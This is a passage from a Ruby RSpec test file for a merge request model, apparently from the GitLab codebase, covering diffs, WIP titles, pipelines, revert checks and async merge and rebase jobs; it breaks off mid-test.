merge_request.diffs(options).diff_files
end
end
context 'when there are no MR diffs' do
it 'delegates to the compare object, setting expanded: true' do
merge_request.compare = double(:compare)
expect(merge_request.compare).to receive(:diffs).with(options.merge(expanded: true))
merge_request.diffs(options)
end
end
end
describe '#preload_discussions_diff_highlight' do
let(:merge_request) { create(:merge_request) }
context 'with commit diff note' do
let(:other_merge_request) { create(:merge_request) }
let!(:diff_note) do
create(:diff_note_on_commit, project: merge_request.project)
end
let!(:other_mr_diff_note) do
create(:diff_note_on_commit, project: other_merge_request.project)
end
it 'preloads diff highlighting' do
expect_next_instance_of(Gitlab::DiscussionsDiff::FileCollection) do |collection|
note_diff_file = diff_note.note_diff_file
expect(collection)
.to receive(:load_highlight)
.with([note_diff_file.id]).and_call_original
end
merge_request.preload_discussions_diff_highlight
end
end
context 'with merge request diff note' do
let!(:unresolved_diff_note) do
create(:diff_note_on_merge_request, project: merge_request.project, noteable: merge_request)
end
let!(:resolved_diff_note) do
create(:diff_note_on_merge_request, :resolved, project: merge_request.project, noteable: merge_request)
end
it 'preloads diff highlighting' do
expect_next_instance_of(Gitlab::DiscussionsDiff::FileCollection) do |collection|
note_diff_file = unresolved_diff_note.note_diff_file
expect(collection)
.to receive(:load_highlight)
.with([note_diff_file.id])
.and_call_original
end
merge_request.preload_discussions_diff_highlight
end
end
end
describe '#diff_size' do
let(:merge_request) do
build(:merge_request, source_branch: 'expand-collapse-files', target_branch: 'master')
end
context 'when there are MR diffs' do
it 'returns the correct count' do
merge_request.save
expect(merge_request.diff_size).to eq('105')
end
it 'returns the correct overflow count' do
allow(Commit).to receive(:max_diff_options).and_return(max_files: 2)
merge_request.save
expect(merge_request.diff_size).to eq('2+')
end
it 'does not perform highlighting' do
merge_request.save
expect(Gitlab::Diff::Highlight).not_to receive(:new)
merge_request.diff_size
end
end
context 'when there are no MR diffs' do
def set_compare(merge_request)
merge_request.compare = CompareService.new(
merge_request.source_project,
merge_request.source_branch
).execute(
merge_request.target_project,
merge_request.target_branch
)
end
it 'returns the correct count' do
set_compare(merge_request)
expect(merge_request.diff_size).to eq('105')
end
it 'returns the correct overflow count' do
allow(Commit).to receive(:max_diff_options).and_return(max_files: 2)
set_compare(merge_request)
expect(merge_request.diff_size).to eq('2+')
end
it 'does not perform highlighting' do
set_compare(merge_request)
expect(Gitlab::Diff::Highlight).not_to receive(:new)
merge_request.diff_size
end
end
end
describe '#modified_paths' do
let(:paths) { double(:paths) }
subject(:merge_request) { build(:merge_request) }
before do
expect(diff).to receive(:modified_paths).and_return(paths)
end
context 'when past_merge_request_diff is specified' do
let(:another_diff) { double(:merge_request_diff) }
let(:diff) { another_diff }
it 'returns affected file paths from specified past_merge_request_diff' do
expect(merge_request.modified_paths(past_merge_request_diff: another_diff)).to eq(paths)
end
end
context 'when compare is present' do
let(:compare) { double(:compare) }
let(:diff) { compare }
it 'returns affected file paths from compare' do
merge_request.compare = compare
expect(merge_request.modified_paths).to eq(paths)
end
end
context 'when no arguments provided' do
let(:diff) { merge_request.merge_request_diff }
subject(:merge_request) { create(:merge_request, source_branch: 'feature', target_branch: 'master') }
it 'returns affected file paths for merge_request_diff' do
expect(merge_request.modified_paths).to eq(paths)
end
end
end
describe "#related_notes" do
let!(:merge_request) { create(:merge_request) }
before do
allow(merge_request).to receive(:commits) { [merge_request.source_project.repository.commit] }
create(:note_on_commit, commit_id: merge_request.commits.first.id,
project: merge_request.project)
create(:note, noteable: merge_request, project: merge_request.project)
end
it "includes notes for commits" do
expect(merge_request.commits).not_to be_empty
expect(merge_request.related_notes.count).to eq(2)
end
it "includes notes for commits from target project as well" do
create(:note_on_commit, commit_id: merge_request.commits.first.id,
project: merge_request.target_project)
expect(merge_request.commits).not_to be_empty
expect(merge_request.related_notes.count).to eq(3)
end
it "excludes system notes for commits" do
system_note = create(:note_on_commit, :system, commit_id: merge_request.commits.first.id,
project: merge_request.project)
expect(merge_request.related_notes.count).to eq(2)
expect(merge_request.related_notes).not_to include(system_note)
end
end
describe '#for_fork?' do
it 'returns true if the merge request is for a fork' do
subject.source_project = build_stubbed(:project, namespace: create(:group))
subject.target_project = build_stubbed(:project, namespace: create(:group))
expect(subject.for_fork?).to be_truthy
end
it 'returns false if is not for a fork' do
expect(subject.for_fork?).to be_falsey
end
end
describe '#closes_issues' do
let(:issue0) { create :issue, project: subject.project }
let(:issue1) { create :issue, project: subject.project }
let(:commit0) { double('commit0', safe_message: "Fixes #{issue0.to_reference}") }
let(:commit1) { double('commit1', safe_message: "Fixes #{issue0.to_reference}") }
let(:commit2) { double('commit2', safe_message: "Fixes #{issue1.to_reference}") }
before do
subject.project.add_developer(subject.author)
allow(subject).to receive(:commits).and_return([commit0, commit1, commit2])
end
it 'accesses the set of issues that will be closed on acceptance' do
allow(subject.project).to receive(:default_branch)
.and_return(subject.target_branch)
closed = subject.closes_issues
expect(closed).to include(issue0, issue1)
end
it 'only lists issues as to be closed if it targets the default branch' do
allow(subject.project).to receive(:default_branch).and_return('master')
subject.target_branch = 'something-else'
expect(subject.closes_issues).to be_empty
end
end
describe '#issues_mentioned_but_not_closing' do
let(:closing_issue) { create :issue, project: subject.project }
let(:mentioned_issue) { create :issue, project: subject.project }
let(:commit) { double('commit', safe_message: "Fixes #{closing_issue.to_reference}") }
it 'detects issues mentioned in description but not closed' do
subject.project.add_developer(subject.author)
subject.description = "Is related to #{mentioned_issue.to_reference} and #{closing_issue.to_reference}"
allow(subject).to receive(:commits).and_return([commit])
allow(subject.project).to receive(:default_branch)
.and_return(subject.target_branch)
subject.cache_merge_request_closes_issues!
expect(subject.issues_mentioned_but_not_closing(subject.author)).to match_array([mentioned_issue])
end
context 'when the project has an external issue tracker' do
before do
subject.project.add_developer(subject.author)
commit = double(:commit, safe_message: 'Fixes TEST-3')
create(:jira_service, project: subject.project)
allow(subject).to receive(:commits).and_return([commit])
allow(subject).to receive(:description).and_return('Is related to TEST-2 and TEST-3')
allow(subject.project).to receive(:default_branch).and_return(subject.target_branch)
end
it 'detects issues mentioned in description but not closed' do
subject.cache_merge_request_closes_issues!
expect(subject.issues_mentioned_but_not_closing(subject.author).map(&:to_s)).to match_array(['TEST-2'])
end
end
end
describe "#work_in_progress?" do
['WIP ', 'WIP:', 'WIP: ', '[WIP]', '[WIP] ', ' [WIP] WIP [WIP] WIP: WIP '].each do |wip_prefix|
it "detects the '#{wip_prefix}' prefix" do
subject.title = "#{wip_prefix}#{subject.title}"
expect(subject.work_in_progress?).to eq true
end
end
it "doesn't detect WIP for words starting with WIP" do
subject.title = "Wipwap #{subject.title}"
expect(subject.work_in_progress?).to eq false
end
it "doesn't detect WIP for words containing with WIP" do
subject.title = "WupWipwap #{subject.title}"
expect(subject.work_in_progress?).to eq false
end
it "doesn't detect WIP by default" do
expect(subject.work_in_progress?).to eq false
end
end
describe "#wipless_title" do
['WIP ', 'WIP:', 'WIP: ', '[WIP]', '[WIP] ', '[WIP] WIP [WIP] WIP: WIP '].each do |wip_prefix|
it "removes the '#{wip_prefix}' prefix" do
wipless_title = subject.title
subject.title = "#{wip_prefix}#{subject.title}"
expect(subject.wipless_title).to eq wipless_title
end
it "is satisfies the #work_in_progress? method" do
subject.title = "#{wip_prefix}#{subject.title}"
subject.title = subject.wipless_title
expect(subject.work_in_progress?).to eq false
end
end
end
describe "#wip_title" do
it "adds the WIP: prefix to the title" do
wip_title = "WIP: #{subject.title}"
expect(subject.wip_title).to eq wip_title
end
it "does not add the WIP: prefix multiple times" do
wip_title = "WIP: #{subject.title}"
subject.title = subject.wip_title
subject.title = subject.wip_title
expect(subject.wip_title).to eq wip_title
end
it "is satisfies the #work_in_progress? method" do
subject.title = subject.wip_title
expect(subject.work_in_progress?).to eq true
end
end
describe '#can_remove_source_branch?' do
set(:user) { create(:user) }
set(:merge_request) { create(:merge_request, :simple) }
subject { merge_request }
before do
subject.source_project.add_maintainer(user)
end
it "can't be removed when its a protected branch" do
allow(ProtectedBranch).to receive(:protected?).and_return(true)
expect(subject.can_remove_source_branch?(user)).to be_falsey
end
it "can't remove a root ref" do
subject.update(source_branch: 'master', target_branch: 'feature')
expect(subject.can_remove_source_branch?(user)).to be_falsey
end
it "is unable to remove the source branch for a project the user cannot push to" do
user2 = create(:user)
expect(subject.can_remove_source_branch?(user2)).to be_falsey
end
it "can be removed if the last commit is the head of the source branch" do
allow(subject).to receive(:source_branch_head).and_return(subject.diff_head_commit)
expect(subject.can_remove_source_branch?(user)).to be_truthy
end
it "cannot be removed if the last commit is not also the head of the source branch" do
subject.clear_memoized_shas
subject.source_branch = "lfs"
expect(subject.can_remove_source_branch?(user)).to be_falsey
end
end
describe '#default_merge_commit_message' do
it 'includes merge information as the title' do
request = build(:merge_request, source_branch: 'source', target_branch: 'target')
expect(request.default_merge_commit_message)
.to match("Merge branch 'source' into 'target'\n\n")
end
it 'includes its title in the body' do
request = build(:merge_request, title: 'Remove all technical debt')
expect(request.default_merge_commit_message)
.to match("Remove all technical debt\n\n")
end
it 'includes its closed issues in the body' do
issue = create(:issue, project: subject.project)
subject.project.add_developer(subject.author)
subject.description = "This issue Closes #{issue.to_reference}"
allow(subject.project).to receive(:default_branch).and_return(subject.target_branch)
subject.cache_merge_request_closes_issues!
expect(subject.default_merge_commit_message)
.to match("Closes #{issue.to_reference}")
end
it 'includes its reference in the body' do
request = build_stubbed(:merge_request)
expect(request.default_merge_commit_message)
.to match("See merge request #{request.to_reference(full: true)}")
end
it 'excludes multiple linebreak runs when description is blank' do
request = build(:merge_request, title: 'Title', description: nil)
expect(request.default_merge_commit_message).not_to match("Title\n\n\n\n")
end
it 'includes its description in the body' do
request = build(:merge_request, description: 'By removing all code')
expect(request.default_merge_commit_message(include_description: true))
.to match("By removing all code\n\n")
end
it 'does not includes its description in the body' do
request = build(:merge_request, description: 'By removing all code')
expect(request.default_merge_commit_message)
.not_to match("By removing all code\n\n")
end
end
describe "#auto_merge_strategy" do
subject { merge_request.auto_merge_strategy }
let(:merge_request) { create(:merge_request, :merge_when_pipeline_succeeds) }
it { is_expected.to eq('merge_when_pipeline_succeeds') }
context 'when auto merge is disabled' do
let(:merge_request) { create(:merge_request) }
it { is_expected.to be_nil }
end
end
describe '#committers' do
it 'returns all the committers of every commit in the merge request' do
users = subject.commits.without_merge_commits.map(&:committer_email).uniq.map do |email|
create(:user, email: email)
end
expect(subject.committers).to match_array(users)
end
it 'returns an empty array if no committer is associated with a user' do
expect(subject.committers).to be_empty
end
end
describe '#hook_attrs' do
it 'delegates to Gitlab::HookData::MergeRequestBuilder#build' do
builder = double
expect(Gitlab::HookData::MergeRequestBuilder)
.to receive(:new).with(subject).and_return(builder)
expect(builder).to receive(:build)
subject.hook_attrs
end
end
describe '#diverged_commits_count' do
let(:project) { create(:project, :repository) }
let(:forked_project) { fork_project(project, nil, repository: true) }
context 'when the target branch does not exist anymore' do
subject { create(:merge_request, source_project: project, target_project: project) }
before do
project.repository.raw_repository.delete_branch(subject.target_branch)
subject.clear_memoized_shas
end
it 'does not crash' do
expect { subject.diverged_commits_count }.not_to raise_error
end
it 'returns 0' do
expect(subject.diverged_commits_count).to eq(0)
end
end
context 'diverged on same repository' do
subject(:merge_request_with_divergence) { create(:merge_request, :diverged, source_project: project, target_project: project) }
it 'counts commits that are on target branch but not on source branch' do
expect(subject.diverged_commits_count).to eq(29)
end
end
context 'diverged on fork' do
subject(:merge_request_fork_with_divergence) { create(:merge_request, :diverged, source_project: forked_project, target_project: project) }
it 'counts commits that are on target branch but not on source branch' do
expect(subject.diverged_commits_count).to eq(29)
end
end
context 'rebased on fork' do
subject(:merge_request_rebased) { create(:merge_request, :rebased, source_project: forked_project, target_project: project) }
it 'counts commits that are on target branch but not on source branch' do
expect(subject.diverged_commits_count).to eq(0)
end
end
describe 'caching' do
before do
allow(Rails).to receive(:cache).and_return(ActiveSupport::Cache::MemoryStore.new)
end
it 'caches the output' do
expect(subject).to receive(:compute_diverged_commits_count)
.once
.and_return(2)
subject.diverged_commits_count
subject.diverged_commits_count
end
it 'invalidates the cache when the source sha changes' do
expect(subject).to receive(:compute_diverged_commits_count)
.twice
.and_return(2)
subject.diverged_commits_count
allow(subject).to receive(:source_branch_sha).and_return('123abc')
subject.diverged_commits_count
end
it 'invalidates the cache when the target sha changes' do
expect(subject).to receive(:compute_diverged_commits_count)
.twice
.and_return(2)
subject.diverged_commits_count
allow(subject).to receive(:target_branch_sha).and_return('123abc')
subject.diverged_commits_count
end
end
end
it_behaves_like 'an editable mentionable' do
subject { create(:merge_request, :simple) }
let(:backref_text) { "merge request #{subject.to_reference}" }
let(:set_mentionable_text) { ->(txt) { subject.description = txt } }
end
it_behaves_like 'a Taskable' do
subject { create :merge_request, :simple }
end
describe '#commit_shas' do
before do
allow(subject.merge_request_diff).to receive(:commit_shas)
.and_return(['sha1'])
end
it 'delegates to merge request diff' do
expect(subject.commit_shas).to eq ['sha1']
end
end
context 'head pipeline' do
let(:diff_head_sha) { Digest::SHA1.hexdigest(SecureRandom.hex) }
before do
allow(subject).to receive(:diff_head_sha).and_return(diff_head_sha)
end
describe '#head_pipeline' do
it 'returns nil for MR without head_pipeline_id' do
subject.update_attribute(:head_pipeline_id, nil)
expect(subject.head_pipeline).to be_nil
end
context 'when the source project does not exist' do
it 'returns nil' do
allow(subject).to receive(:source_project).and_return(nil)
expect(subject.head_pipeline).to be_nil
end
end
end
describe '#actual_head_pipeline' do
it 'returns nil for MR with old pipeline' do
pipeline = create(:ci_empty_pipeline, sha: 'notlatestsha')
subject.update_attribute(:head_pipeline_id, pipeline.id)
expect(subject.actual_head_pipeline).to be_nil
end
it 'returns the pipeline for MR with recent pipeline' do
pipeline = create(:ci_empty_pipeline, sha: diff_head_sha)
subject.update_attribute(:head_pipeline_id, pipeline.id)
expect(subject.actual_head_pipeline).to eq(subject.head_pipeline)
expect(subject.actual_head_pipeline).to eq(pipeline)
end
it 'returns the pipeline for MR with recent merge request pipeline' do
pipeline = create(:ci_empty_pipeline, sha: 'merge-sha', source_sha: diff_head_sha)
subject.update_attribute(:head_pipeline_id, pipeline.id)
expect(subject.actual_head_pipeline).to eq(subject.head_pipeline)
expect(subject.actual_head_pipeline).to eq(pipeline)
end
it 'returns nil when source project does not exist' do
allow(subject).to receive(:source_project).and_return(nil)
expect(subject.actual_head_pipeline).to be_nil
end
end
end
describe '#merge_pipeline' do
it 'returns nil when not merged' do
expect(subject.merge_pipeline).to be_nil
end
context 'when the MR is merged' do
let(:sha) { subject.target_project.commit.id }
let(:pipeline) { create(:ci_empty_pipeline, sha: sha, ref: subject.target_branch, project: subject.target_project) }
before do
subject.mark_as_merged!
subject.update_attribute(:merge_commit_sha, pipeline.sha)
end
it 'returns the post-merge pipeline' do
expect(subject.merge_pipeline).to eq(pipeline)
end
end
end
describe '#has_ci?' do
let(:merge_request) { build_stubbed(:merge_request) }
context 'has ci' do
it 'returns true if MR has head_pipeline_id and commits' do
allow(merge_request).to receive_message_chain(:source_project, :ci_service) { nil }
allow(merge_request).to receive(:head_pipeline_id) { double }
allow(merge_request).to receive(:has_no_commits?) { false }
expect(merge_request.has_ci?).to be(true)
end
it 'returns true if MR has any pipeline and commits' do
allow(merge_request).to receive_message_chain(:source_project, :ci_service) { nil }
allow(merge_request).to receive(:head_pipeline_id) { nil }
allow(merge_request).to receive(:has_no_commits?) { false }
allow(merge_request).to receive(:all_pipelines) { [double] }
expect(merge_request.has_ci?).to be(true)
end
it 'returns true if MR has CI service and commits' do
allow(merge_request).to receive_message_chain(:source_project, :ci_service) { double }
allow(merge_request).to receive(:head_pipeline_id) { nil }
allow(merge_request).to receive(:has_no_commits?) { false }
allow(merge_request).to receive(:all_pipelines) { [] }
expect(merge_request.has_ci?).to be(true)
end
end
context 'has no ci' do
it 'returns false if MR has no CI service nor pipeline, and no commits' do
allow(merge_request).to receive_message_chain(:source_project, :ci_service) { nil }
allow(merge_request).to receive(:head_pipeline_id) { nil }
allow(merge_request).to receive(:all_pipelines) { [] }
allow(merge_request).to receive(:has_no_commits?) { true }
expect(merge_request.has_ci?).to be(false)
end
end
end
describe '#all_pipelines' do
shared_examples 'returning pipelines with proper ordering' do
let!(:all_pipelines) do
subject.all_commit_shas.map do |sha|
create(:ci_empty_pipeline,
project: subject.source_project,
sha: sha,
ref: subject.source_branch)
end
end
it 'returns all pipelines' do
expect(subject.all_pipelines).not_to be_empty
expect(subject.all_pipelines).to eq(all_pipelines.reverse)
end
end
context 'with single merge_request_diffs' do
it_behaves_like 'returning pipelines with proper ordering'
end
context 'with multiple irrelevant merge_request_diffs' do
before do
subject.update(target_branch: 'v1.0.0')
end
it_behaves_like 'returning pipelines with proper ordering'
end
context 'with unsaved merge request' do
subject { build(:merge_request) }
let!(:pipeline) do
create(:ci_empty_pipeline,
project: subject.project,
sha: subject.diff_head_sha,
ref: subject.source_branch)
end
it 'returns pipelines from diff_head_sha' do
expect(subject.all_pipelines).to contain_exactly(pipeline)
end
end
context 'when pipelines exist for the branch and merge request' do
let(:source_ref) { 'feature' }
let(:target_ref) { 'master' }
let!(:branch_pipeline) do
create(:ci_pipeline,
source: :push,
project: project,
ref: source_ref,
sha: shas.second)
end
let!(:detached_merge_request_pipeline) do
create(:ci_pipeline,
source: :merge_request_event,
project: project,
ref: source_ref,
sha: shas.second,
merge_request: merge_request)
end
let(:merge_request) do
create(:merge_request,
source_project: project,
source_branch: source_ref,
target_project: project,
target_branch: target_ref)
end
let(:project) { create(:project, :repository) }
let(:shas) { project.repository.commits(source_ref, limit: 2).map(&:id) }
before do
allow(merge_request).to receive(:all_commit_shas) { shas }
end
it 'returns merge request pipeline first' do
expect(merge_request.all_pipelines)
.to eq([detached_merge_request_pipeline,
branch_pipeline])
end
context 'when there are a branch pipeline and a merge request pipeline' do
let!(:branch_pipeline_2) do
create(:ci_pipeline,
source: :push,
project: project,
ref: source_ref,
sha: shas.first)
end
let!(:detached_merge_request_pipeline_2) do
create(:ci_pipeline,
source: :merge_request_event,
project: project,
ref: source_ref,
sha: shas.first,
merge_request: merge_request)
end
it 'returns merge request pipelines first' do
expect(merge_request.all_pipelines)
.to eq([detached_merge_request_pipeline_2,
detached_merge_request_pipeline,
branch_pipeline_2,
branch_pipeline])
end
end
context 'when there are multiple merge request pipelines from the same branch' do
let!(:branch_pipeline_2) do
create(:ci_pipeline,
source: :push,
project: project,
ref: source_ref,
sha: shas.first)
end
let!(:detached_merge_request_pipeline_2) do
create(:ci_pipeline,
source: :merge_request_event,
project: project,
ref: source_ref,
sha: shas.first,
merge_request: merge_request_2)
end
let(:merge_request_2) do
create(:merge_request,
source_project: project,
source_branch: source_ref,
target_project: project,
target_branch: 'stable')
end
before do
allow(merge_request_2).to receive(:all_commit_shas) { shas }
end
it 'returns only related merge request pipelines' do
expect(merge_request.all_pipelines)
.to eq([detached_merge_request_pipeline,
branch_pipeline_2,
branch_pipeline])
expect(merge_request_2.all_pipelines)
.to eq([detached_merge_request_pipeline_2,
branch_pipeline_2,
branch_pipeline])
end
end
context 'when detached merge request pipeline is run on head ref of the merge request' do
let!(:detached_merge_request_pipeline) do
create(:ci_pipeline,
source: :merge_request_event,
project: project,
ref: merge_request.ref_path,
sha: shas.second,
merge_request: merge_request)
end
it 'sets the head ref of the merge request to the pipeline ref' do
expect(detached_merge_request_pipeline.ref).to match(%r{refs/merge-requests/\d+/head})
end
it 'includes the detached merge request pipeline even though the ref is custom path' do
expect(merge_request.all_pipelines).to include(detached_merge_request_pipeline)
end
end
end
end
describe '#update_head_pipeline' do
subject { merge_request.update_head_pipeline }
let(:merge_request) { create(:merge_request) }
context 'when there is a pipeline with the diff head sha' do
let!(:pipeline) do
create(:ci_empty_pipeline,
project: merge_request.project,
sha: merge_request.diff_head_sha,
ref: merge_request.source_branch)
end
it 'updates the head pipeline' do
expect { subject }
.to change { merge_request.reload.head_pipeline }
.from(nil).to(pipeline)
end
context 'when merge request has already had head pipeline' do
before do
merge_request.update!(head_pipeline: pipeline)
end
context 'when failed to find an actual head pipeline' do
before do
allow(merge_request).to receive(:find_actual_head_pipeline) { }
end
it 'does not update the current head pipeline' do
expect { subject }
.not_to change { merge_request.reload.head_pipeline }
end
end
end
end
context 'when detached merge request pipeline is run on head ref of the merge request' do
let!(:pipeline) do
create(:ci_pipeline,
source: :merge_request_event,
project: merge_request.source_project,
ref: merge_request.ref_path,
sha: sha,
merge_request: merge_request)
end
let(:sha) { merge_request.diff_head_sha }
it 'sets the head ref of the merge request to the pipeline ref' do
expect(pipeline.ref).to match(%r{refs/merge-requests/\d+/head})
end
it 'updates correctly even though the target branch name of the merge request is different from the pipeline ref' do
expect { subject }
.to change { merge_request.reload.head_pipeline }
.from(nil).to(pipeline)
end
context 'when sha is not HEAD of the source branch' do
let(:sha) { merge_request.diff_base_sha }
it 'does not update head pipeline' do
expect { subject }.not_to change { merge_request.reload.head_pipeline }
end
end
end
context 'when there are no pipelines with the diff head sha' do
it 'does not update the head pipeline' do
expect { subject }
.not_to change { merge_request.reload.head_pipeline }
end
end
end
describe '#has_test_reports?' do
subject { merge_request.has_test_reports? }
let(:project) { create(:project, :repository) }
context 'when head pipeline has test reports' do
let(:merge_request) { create(:merge_request, :with_test_reports, source_project: project) }
it { is_expected.to be_truthy }
end
context 'when head pipeline does not have test reports' do
let(:merge_request) { create(:merge_request, source_project: project) }
it { is_expected.to be_falsey }
end
end
describe '#calculate_reactive_cache' do
let(:project) { create(:project, :repository) }
let(:merge_request) { create(:merge_request, source_project: project) }
subject { merge_request.calculate_reactive_cache(service_class_name) }
context 'when given an unknown service class name' do
let(:service_class_name) { 'Integer' }
it 'raises a NameError exception' do
expect { subject }.to raise_error(NameError, service_class_name)
end
end
context 'when given a known service class name' do
let(:service_class_name) { 'Ci::CompareTestReportsService' }
it 'does not raises a NameError exception' do
allow_any_instance_of(service_class_name.constantize).to receive(:execute).and_return(nil)
expect { subject }.not_to raise_error
end
end
end
describe '#compare_test_reports' do
subject { merge_request.compare_test_reports }
let(:project) { create(:project, :repository) }
let(:merge_request) { create(:merge_request, source_project: project) }
let!(:base_pipeline) do
create(:ci_pipeline,
:with_test_reports,
project: project,
ref: merge_request.target_branch,
sha: merge_request.diff_base_sha)
end
before do
merge_request.update!(head_pipeline_id: head_pipeline.id)
end
context 'when head pipeline has test reports' do
let!(:head_pipeline) do
create(:ci_pipeline,
:with_test_reports,
project: project,
ref: merge_request.source_branch,
sha: merge_request.diff_head_sha)
end
context 'when reactive cache worker is parsing asynchronously' do
it 'returns status' do
expect(subject[:status]).to eq(:parsing)
end
end
context 'when reactive cache worker is inline' do
before do
synchronous_reactive_cache(merge_request)
end
it 'returns status and data' do
expect_any_instance_of(Ci::CompareTestReportsService)
.to receive(:execute).with(base_pipeline, head_pipeline).and_call_original
subject
end
context 'when cached results is not latest' do
before do
allow_any_instance_of(Ci::CompareTestReportsService)
.to receive(:latest?).and_return(false)
end
it 'raises and InvalidateReactiveCache error' do
expect { subject }.to raise_error(ReactiveCaching::InvalidateReactiveCache)
end
end
end
end
context 'when head pipeline does not have test reports' do
let!(:head_pipeline) do
create(:ci_pipeline,
project: project,
ref: merge_request.source_branch,
sha: merge_request.diff_head_sha)
end
it 'returns status and error message' do
expect(subject[:status]).to eq(:error)
expect(subject[:status_reason]).to eq('This merge request does not have test reports')
end
end
end
describe '#all_commit_shas' do
context 'when merge request is persisted' do
let(:all_commit_shas) do
subject.merge_request_diffs.flat_map(&:commits).map(&:sha).uniq
end
shared_examples 'returning all SHA' do
it 'returns all SHAs from all merge_request_diffs' do
expect(subject.merge_request_diffs.size).to eq(2)
expect(subject.all_commit_shas).to match_array(all_commit_shas)
end
end
context 'with a completely different branch' do
before do
subject.update(target_branch: 'csv')
end
it_behaves_like 'returning all SHA'
end
context 'with a branch having no difference' do
before do
subject.update(target_branch: 'branch-merged')
subject.reload # make sure commits were not cached
end
it_behaves_like 'returning all SHA'
end
end
context 'when merge request is not persisted' do
context 'when compare commits are set in the service' do
let(:commit) { spy('commit') }
subject do
build(:merge_request, compare_commits: [commit, commit])
end
it 'returns commits from compare commits temporary data' do
expect(subject.all_commit_shas).to eq [commit, commit]
end
end
context 'when compare commits are not set in the service' do
subject { build(:merge_request) }
it 'returns array with diff head sha element only' do
expect(subject.all_commit_shas).to eq [subject.diff_head_sha]
end
end
end
end
describe '#short_merge_commit_sha' do
let(:merge_request) { build_stubbed(:merge_request) }
it 'returns short id when there is a merge_commit_sha' do
merge_request.merge_commit_sha = 'f7ce827c314c9340b075657fd61c789fb01cf74d'
expect(merge_request.short_merge_commit_sha).to eq('f7ce827c')
end
it 'returns nil when there is no merge_commit_sha' do
merge_request.merge_commit_sha = nil
expect(merge_request.short_merge_commit_sha).to be_nil
end
end
describe '#can_be_reverted?' do
context 'when there is no merge_commit for the MR' do
before do
subject.metrics.update!(merged_at: Time.now.utc)
end
it 'returns false' do
expect(subject.can_be_reverted?(nil)).to be_falsey
end
end
context 'when the MR has been merged' do
before do
MergeRequests::MergeService
.new(subject.target_project, subject.author)
.execute(subject)
end
context 'when there is no revert commit' do
it 'returns true' do
expect(subject.can_be_reverted?(nil)).to be_truthy
end
end
context 'when there is no merged_at for the MR' do
before do
subject.metrics.update!(merged_at: nil)
end
it 'returns true' do
expect(subject.can_be_reverted?(nil)).to be_truthy
end
end
context 'when there is a revert commit' do
let(:current_user) { subject.author }
let(:branch) { subject.target_branch }
let(:project) { subject.target_project }
let(:revert_commit_id) do
params = {
commit: subject.merge_commit,
branch_name: branch,
start_branch: branch
}
Commits::RevertService.new(project, current_user, params).execute[:result]
end
before do
project.add_maintainer(current_user)
ProcessCommitWorker.new.perform(project.id,
current_user.id,
project.commit(revert_commit_id).to_hash,
project.default_branch == branch)
end
context 'but merged at timestamp cannot be found' do
before do
allow(subject).to receive(:merged_at) { nil }
end
it 'returns false' do
expect(subject.can_be_reverted?(current_user)).to be_falsey
end
end
context 'when the revert commit is mentioned in a note after the MR was merged' do
it 'returns false' do
expect(subject.can_be_reverted?(current_user)).to be_falsey
end
end
context 'when there is no merged_at for the MR' do
before do
subject.metrics.update!(merged_at: nil)
end
it 'returns false' do
expect(subject.can_be_reverted?(current_user)).to be_falsey
end
end
context 'when the revert commit is mentioned in a note just before the MR was merged' do
before do
subject.notes.last.update!(created_at: subject.metrics.merged_at - 30.seconds)
end
it 'returns false' do
expect(subject.can_be_reverted?(current_user)).to be_falsey
end
end
context 'when the revert commit is mentioned in a note long before the MR was merged' do
before do
subject.notes.last.update!(created_at: subject.metrics.merged_at - 2.minutes)
end
it 'returns true' do
expect(subject.can_be_reverted?(current_user)).to be_truthy
end
end
end
end
end
describe '#merged_at' do
context 'when MR is not merged' do
let(:merge_request) { create(:merge_request, :closed) }
it 'returns nil' do
expect(merge_request.merged_at).to be_nil
end
end
context 'when metrics has merged_at data' do
let(:merge_request) { create(:merge_request, :merged) }
before do
merge_request.metrics.update!(merged_at: 1.day.ago)
end
it 'returns metrics merged_at' do
expect(merge_request.merged_at).to eq(merge_request.metrics.merged_at)
end
end
context 'when merged event is persisted, but no metrics merged_at is persisted' do
let(:user) { create(:user) }
let(:merge_request) { create(:merge_request, :merged) }
before do
EventCreateService.new.merge_mr(merge_request, user)
end
it 'returns merged event creation date' do
expect(merge_request.merge_event).to be_persisted
expect(merge_request.merged_at).to eq(merge_request.merge_event.created_at)
end
end
context 'when merging note is persisted, but no metrics or merge event exists' do
let(:user) { create(:user) }
let(:merge_request) { create(:merge_request, :merged) }
before do
merge_request.metrics.destroy!
SystemNoteService.change_status(merge_request,
merge_request.target_project,
user,
merge_request.state, nil)
end
it 'returns merging note creation date' do
expect(merge_request.reload.metrics).to be_nil
expect(merge_request.merge_event).to be_nil
expect(merge_request.notes.count).to eq(1)
expect(merge_request.merged_at).to eq(merge_request.notes.first.created_at)
end
end
end
describe '#participants' do
let(:project) { create(:project, :public) }
let(:mr) do
create(:merge_request, source_project: project, target_project: project)
end
let!(:note1) do
create(:note_on_merge_request, noteable: mr, project: project, note: 'a')
end
let!(:note2) do
create(:note_on_merge_request, noteable: mr, project: project, note: 'b')
end
it 'includes the merge request author' do
expect(mr.participants).to include(mr.author)
end
it 'includes the authors of the notes' do
expect(mr.participants).to include(note1.author, note2.author)
end
end
describe 'cached counts' do
it 'updates when assignees change' do
user1 = create(:user)
user2 = create(:user)
mr = create(:merge_request, assignees: [user1])
mr.project.add_developer(user1)
mr.project.add_developer(user2)
expect(user1.assigned_open_merge_requests_count).to eq(1)
expect(user2.assigned_open_merge_requests_count).to eq(0)
mr.assignees = [user2]
expect(user1.assigned_open_merge_requests_count).to eq(0)
expect(user2.assigned_open_merge_requests_count).to eq(1)
end
end
describe '#merge_async' do
it 'enqueues MergeWorker job and updates merge_jid' do
merge_request = create(:merge_request)
user_id = double(:user_id)
params = {}
merge_jid = 'hash-123'
expect(merge_request).to receive(:expire_etag_cache)
expect(MergeWorker).to receive(:perform_async).with(merge_request.id, user_id, params) do
merge_jid
end
merge_request.merge_async(user_id, params)
expect(merge_request.reload.merge_jid).to eq(merge_jid)
end
end
describe '#rebase_async' do
let(:merge_request) { create(:merge_request) }
let(:user_id) { double(:user_id) }
let(:rebase_jid) { 'rebase-jid' }
subject(:execute) { merge_request.rebase_async(user_id) }
it 'atomically enqueues a RebaseWorker job and updates rebase_jid' do
expect(RebaseWorker)
.to receive(:perform_async)
.with(merge_request.id, user_id)
.and_return(rebase_jid)
expect(merge_request).to receive(:expire_etag_cache)
expect(merge_request).to receive(:lock!).and_call_original
execute
expect(merge_request.rebase_jid).to eq(rebase_jid)
end
it 'refuses to enqueue a job if a rebase is in progress' do
merge_request.update_column(:rebase_jid, rebase_jid)
expect(RebaseWorker).not_to receive(:perform_async)
expect(Gitlab::SidekiqStatus)
